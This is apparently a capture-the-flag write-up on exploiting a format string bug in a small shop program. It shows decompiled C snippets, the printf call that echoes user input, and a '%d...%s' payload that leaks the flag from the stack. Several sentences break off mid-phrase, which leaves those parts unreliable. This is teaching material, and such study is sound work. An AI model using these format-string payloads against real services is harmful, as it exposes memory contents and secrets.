We start by downloading the binary.
We will now use Ghidra to decompile the binary and look at the source code.
After looking a bit at the source code, we find a few interesting snippets.
filep = fopen("flag.txt","r");
This line opens the
if (local_11c == 5) {
fgets(local_d8,0x40,filep);
}
This line reads the
puts("\nEnter your choice:");
__isoc99_scanf(&DAT_001021b6,&local_128);
if ((0 < local_128) && (local_128 < 7)) {
local_11c = local_128 + -1
}
This line reads the user's choice and stores it in the
Because we want the previous snippet to read the flag, we need to set the
puts("\nPlease enter your shipping address:");
fgets(local_98,0x80,stdin);
puts("\nYour floor mat will be shipped to:\n");
printf(local_98);
This snippet reads the user's shipping address and prints it back to the user. It uses
To test this, we will create a sample
Enter your choice:
6
Please enter your shipping address:
%p
Your floor mat will be shipped to:
0x7fecbda18803
This indicates that this is vulnerable. We will now use gdb with pwndbg to examine the stack.
We will set our breakpoint at the
If we look at the stack we can see
Our final input will be
If we run this locally we get the following output:
Enter your choice:
6
Please enter your shipping address:
%d%d%d%d%d%d%d%d%d%s
Your floor mat will be shipped to:
-10346311650-1035535616614400-1649304040061000EXAMPLEFLAG
Let's connect to